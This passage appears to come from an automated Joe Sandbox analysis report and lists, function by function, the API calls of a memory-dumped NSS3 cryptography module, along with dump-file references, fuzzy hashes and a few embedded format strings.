                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CE78E9B
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CE78EAC
                                                                                                                                                                                                                                                                                                                      • PL_ArenaAllocate.NSS3(?,?), ref: 6CE78EDE
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CE78EF0
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6CE78F00
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE78F0E
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CE78F39
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6CE78F4A
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6CE78F5B
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE78F72
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE78F82
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1569127702-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: a1c6f5d94e40ff0314b3f3bf5b58dbd1a4b8b6f5586ff9b2196117ba761a202f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1ed90bd20a5615bcc96144869499c887873416e07fb10e7fa73e27411ba6d3d8
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1c6f5d94e40ff0314b3f3bf5b58dbd1a4b8b6f5586ff9b2196117ba761a202f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 155118B2E002059FD7309F68CC859AABB79EF65358B24412AEC18AB700E731ED45C7F1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_Lock.NSS3(?), ref: 6CF71000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CE51A48), ref: 6CF29BB3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CE51A48), ref: 6CF29BC8
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CF71016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CF71021
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: TlsGetValue.KERNEL32 ref: 6CF0DD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DDB4
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CF71046
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CF7106B
                                                                                                                                                                                                                                                                                                                      • PR_Lock.NSS3 ref: 6CF71079
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CF71096
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF710A7
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF710B4
                                                                                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6CF710BF
                                                                                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6CF710CA
                                                                                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6CF710D5
                                                                                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?), ref: 6CF710E0
                                                                                                                                                                                                                                                                                                                      • PR_DestroyLock.NSS3(?), ref: 6CF710EB
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF71105
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 8544004-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9e52f5031098060488aa94f1b6e71eedbf5510a4bcf27e3560811efb0b36c121
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0ab52b2da1011ca7ff03be7ef063791b7e4531a80fe2b081a5682c07e4c08298
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e52f5031098060488aa94f1b6e71eedbf5510a4bcf27e3560811efb0b36c121
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01318AB6A00801ABDB119F14EC45A46BB71BF05318B188135E80917F61E772FA78EBE2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CDEDD56
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6CDEDD7C
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CDEDE67
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6CDEDEC4
                                                                                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CDEDECD
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                      • API String ID: 2339628231-598938438
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 73db19d97c684e64b1245c940bb05fca2d884c4fd81d5b38e9e0844aa7342d0a
                                                                                                                                                                                                                                                                                                                      • Instruction ID: c4fccf26e162e924b489ddc836c2a66883bbe2c8d93754c1b68e9de1a07eb688
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73db19d97c684e64b1245c940bb05fca2d884c4fd81d5b38e9e0844aa7342d0a
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7A1C5716047419FD710CF29C880A6AB7F5AFC9308F15892DF8898BB61EB31E955CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6CEAEE0B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: malloc.MOZGLUE(6CEB8D2D,?,00000000,?), ref: 6CEC0BF8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0BE0: TlsGetValue.KERNEL32(6CEB8D2D,?,00000000,?), ref: 6CEC0C15
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEAEEE1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CEA1D7E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA1D50: EnterCriticalSection.KERNEL32(?), ref: 6CEA1D8E
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEA1D50: PR_Unlock.NSS3(?), ref: 6CEA1DD3
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEAEE51
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CEAEE65
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEAEEA2
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEAEEBB
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEAEED0
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEAEF48
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEAEF68
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEAEF7D
                                                                                                                                                                                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6CEAEFA4
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEAEFDA
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CEAF055
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CEAF060
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2524771861-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 44221a74c7750a27f347a8e18f725abe39bc45aae9cf7ca2e20dd10fdc5494ef
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9f73550699f22c1c05189d6751fd259eb4012f97f1ba4f73d9cd5d2003e1544b
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44221a74c7750a27f347a8e18f725abe39bc45aae9cf7ca2e20dd10fdc5494ef
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1814FB5E00609AFDB00DFA5DC85BDE7BB5BF09318F244028E919A7711E731E925CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PK11_SignatureLen.NSS3(?), ref: 6CE74D80
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000000), ref: 6CE74D95
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CE74DF2
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE74E2C
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CE74E43
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CE74E58
                                                                                                                                                                                                                                                                                                                      • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CE74E85
                                                                                                                                                                                                                                                                                                                      • DER_Encode_Util.NSS3(?,?,6CFC05A4,00000000), ref: 6CE74EA7
                                                                                                                                                                                                                                                                                                                      • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CE74F17
                                                                                                                                                                                                                                                                                                                      • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CE74F45
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE74F62
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CE74F7A
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE74F89
                                                                                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE74FC8
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2843999940-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: cffc7db59f927e8fbad3b42ffec92f58ac9c62b1105f30b332828240c136c5a7
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4e495544b44a2266a01c53e722c0bb8341d0d81e19dac34ec542b544ecd49de5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cffc7db59f927e8fbad3b42ffec92f58ac9c62b1105f30b332828240c136c5a7
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5819071A043019FE725CF28D881B6AB7F4AB85358F24852EF958DB741E731E905CFA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CEB5C9B
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CEB5CF4
                                                                                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CEB5CFD
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CEB5D42
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CEB5D4E
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEB5D78
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CEB5E18
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CEB5E5E
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CEB5E72
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEB5E8B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CEAF854
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CEAF868
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CEAF882
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(04C483FF,?,?), ref: 6CEAF889
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CEAF8A4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CEAF8AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CEAF8C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(280F10EC,?,?), ref: 6CEAF8D0
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                                                                                                                      • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d2a8e9c033635613252a07078fc5705cdcf65767d804bcfd736c63ae94a0933d
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 295d3087880c591e2231a1cdb635e47cab8a8c84e3a5e4a34a19047574258162
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2a8e9c033635613252a07078fc5705cdcf65767d804bcfd736c63ae94a0933d
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D71F5B0E062019BEB019F24EE4577B7375AF4131CF340539E809BAB42EB36E915CB92
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(6CEA9582), ref: 6CEA8F5B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBBE30: SECOID_FindOID_Util.NSS3(6CE7311B,00000000,?,6CE7311B,?), ref: 6CEBBE44
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CEA8F6A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CEA8FC3
                                                                                                                                                                                                                                                                                                                      • PK11_GetIVLength.NSS3(-00000001), ref: 6CEA8FE0
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CF8D820,6CEA9576), ref: 6CEA8FF9
                                                                                                                                                                                                                                                                                                                      • DER_GetInteger_Util.NSS3(?), ref: 6CEA901D
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(?), ref: 6CEA903E
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEA9062
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000024,?,?), ref: 6CEA90A2
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(?), ref: 6CEA90CA
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000018,?,?), ref: 6CEA90F0
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE006,00000000), ref: 6CEA912D
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CEA9136
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CEA9145
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3626836424-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8ff74f2033d73c449a8f0bbb4fa2acb07392ae422754f7dba8d0fa42f77993f9
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9b276200a86c383e2febed2bfb6776cb3f14b03a58867a745ab7c5bc733d1451
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ff74f2033d73c449a8f0bbb4fa2acb07392ae422754f7dba8d0fa42f77993f9
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 325103B2A042409FEB00CF68DC81B9BB7F4AF94318F254529E854DB741E736E946CBD2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CE5AF47
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: EnterCriticalSection.KERNEL32 ref: 6CF290E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF29116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: LeaveCriticalSection.KERNEL32 ref: 6CF2913F
                                                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 6CE5AF6D
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE5AFA4
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE5AFAA
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CE5AFB5
                                                                                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6CE5AFF5
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CE5B005
